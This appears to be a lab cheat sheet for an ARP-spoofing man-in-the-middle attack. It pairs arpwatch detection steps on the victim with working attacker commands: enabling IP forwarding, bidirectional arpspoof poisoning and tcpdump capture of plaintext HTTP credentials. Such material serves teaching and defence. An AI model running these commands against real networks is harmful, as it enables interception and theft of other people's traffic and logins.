# On Victim:
apt install arpwatch
systemctl start arpwatch@eth0 # get with ip link
# Watch arpwatch alerts (look for "changed ethernet address" / "flip flop" entries):
tail /var/log/syslog -f | grep arpwatch
# On Attacker: install tcpdump and arpspoof (arpspoof ships with dsniff)
apt install dsniff tcpdump
# Act as Proxy:
# fragrouter -B1
sysctl net.ipv4.conf.eth0.forwarding=1
arpspoof -i eth0 -c own -r -t <VICTIMIP> <ROUTERIP>
# -r means bidirectional poisoning!
tcpdump -i eth0 icmp
# Capture plaintext credentials from HTTP; port 443 traffic is TLS-encrypted, so only ciphertext is visible there
# tshark -i ath0 -x -Y "http.request" dst host IPROUTER and dst port 80
tcpdump -A src <VICTIMIP> and '(tcp port 80) or (tcp port 443)'
# On Victim: signs of the attack (ICMP redirect sent by the attacker, poisoned ARP entry):
# ping 1.1.1.1
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
From ATTACKER: icmp_seq=1 Redirect Host(New nexthop: ROUTER)
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=14.4 ms
# arp -a
# the router's IP now maps to the ATTACKER's MAC — a poisoned ARP entry